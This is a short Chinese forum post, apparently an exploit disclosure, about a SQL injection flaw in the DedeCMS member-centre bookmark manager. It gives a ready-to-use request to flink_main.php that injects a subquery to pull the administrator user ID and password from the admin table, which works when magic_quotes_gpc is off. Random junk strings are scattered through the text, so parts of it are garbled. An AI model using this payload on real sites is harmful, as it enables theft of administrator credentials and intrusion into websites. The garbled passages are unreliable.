DedeCMS会员中心SQL注射漏洞8 n3 P4 ]8 f; I. w g9 h
需要magic_quotes_gpc = Off
2 |1 w8 k2 \ t% K$ K* b/ R会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.% Q" U* Y/ Q7 U, Y9 H
) P: d( U! p/ }; {- JDedeCMS会员中心书签管理SQL注射漏洞5 A- W5 c5 @; a2 N# |$ u
成功利用该漏洞可获得管理员密码
$ r5 s; G' p: t8 j) [
. [* P; |3 z+ D8 u1 X会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
' y3 E! M2 w8 h , p! d) z7 o1 q0 }% b' U
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
) E8 ]% q$ r7 z' } |
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59